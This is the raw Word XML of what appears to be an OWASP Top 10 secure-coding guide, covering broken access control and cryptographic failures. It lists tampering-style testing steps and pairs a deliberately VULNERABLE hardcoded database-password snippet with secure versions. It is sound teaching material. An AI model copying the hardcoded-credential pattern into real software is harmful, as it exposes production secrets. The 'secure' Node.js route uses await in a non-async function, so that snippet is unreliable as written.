        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Burp Suite to intercept requests and modify object identifiers (IDs, GUIDs, filenames)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use OWASP Dirbuster / gobuster to discover hidden endpoints not linked in the UI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decode JWTs at jwt.io and inspect claims; try modifying role or admin fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for missing CSRF tokens in state-changing requests (POST, PUT, DELETE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review source code for authorisation checks that are based on client-supplied data</w:t>
      </w:r>
    </w:p>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Implement server-side authorisation checks on every request — never trust client input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use indirect references (GUIDs or opaque tokens) instead of sequential integer IDs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deny access by default; grant permissions explicitly based on user role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate JWT algorithm server-side; reject tokens with alg:none or unexpected algorithms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use anti-CSRF tokens (synchroniser token pattern) or SameSite cookie attribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the SameSite=Strict or SameSite=Lax cookie attribute to mitigate CSRF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Secure access control (Node.js example)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// SECURE: Server-side authorisation check before returning data</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">app.get('/api/document/:id', authenticate, (req, res) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  const doc = await Document.findById(req.params.id);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (!doc || doc.ownerId !== req.user.id) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return res.status(403).json({ error: 'Forbidden' });</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  res.json(doc);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">});</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SECURE: JWT validation — restrict accepted algorithms</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">jwt.verify(token, secretKey, { algorithms: ['HS256'] }, callback);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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A01 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Always check authorisation server-side, not just on the client</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Never use sequential IDs as the only access control mechanism</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Validate JWT algorithm; never accept alg:none tokens</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Protect state-changing endpoints with CSRF tokens or SameSite cookies</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Test your own application by modifying IDs and tokens in Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A02:2021 — Cryptographic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Data Exposure</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Previously called 'Sensitive Data Exposure', this category focuses on failures related to cryptography that result in exposure of sensitive data. Common failures include transmitting data in cleartext, using weak or outdated cryptographic algorithms, storing passwords without proper hashing, and committing secrets to version control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Attack Patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Credentials Committed to Version Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the most common and impactful mistakes: hardcoding credentials, API keys, or tokens directly in source code and committing them to Git. Even if removed later, the secret may remain in the repository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Hardcoded credentials vs environment variables</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// VULNERABLE: Hardcoded database password in source code</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">const db = mysql.createConnection({</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  host: 'prod-db.internal.com',</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  user: 'admin',</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  password: 'S3cr3tP@ssw0rd!',  // &lt;-- committed to Git</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  database: 'production'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">});</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SECURE: Use environment variables</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">const db = mysql.createConnection({</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  host: process.env.DB_HOST,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  user: process.env.DB_USER,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  password: process.env.DB_PASSWORD,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  database: process.env.DB_NAME</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Weak or Broken Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using outdated algorithms (MD5, SHA-1 for passwords, DES, RC4) provides little or no security. Password hashing must use algorithms specifically designed for that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Weak (Avoid)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Strong (Use Instead)</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MD5 for passwords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scrypt, Argon2id</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SHA-1 for passwords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scrypt, Argon2id</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SHA-256 for passwords (alone)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scrypt, Argon2id (with cost factor)</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DES / 3DES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AES-256-GCM</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ECB mode (AES-ECB)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GCM or CBC with authenticated encryption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Self-rolled crypto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Well-tested crypto libraries only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sensitive Data in Transit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Transmitting sensitive data over HTTP (not HTTPS) exposes it to network eavesdropping (man-in-the-middle attacks). Even with HTTPS, mixed content or improper TLS configuration can undermine security.</w:t>
      </w:r>
    </w:p>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Store all secrets in environment variables or a secrets manager (HashiCorp Vault, AWS Secrets Manager)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use .gitignore and pre-commit hooks to prevent committing .env files or config files with secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash passwords using bcrypt, scrypt, or Argon2id — never MD5 or SHA-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use TLS 1.2 or 1.3 for all data in transit; disable older protocols</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypt sensitive data at rest using AES-256-GCM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan your repository history with tools like truffleHog or git-secrets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Secure password hashing</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// SECURE password hashing with bcrypt (Node.js)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">const bcrypt = require('bcrypt');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">const saltRounds = 12;</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Storing a password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">const hash = await bcrypt.hash(userPassword, saltRounds);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">await db.save({ passwordHash: hash });</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Verifying a password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">const match = await bcrypt.compare(inputPassword, storedHash);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
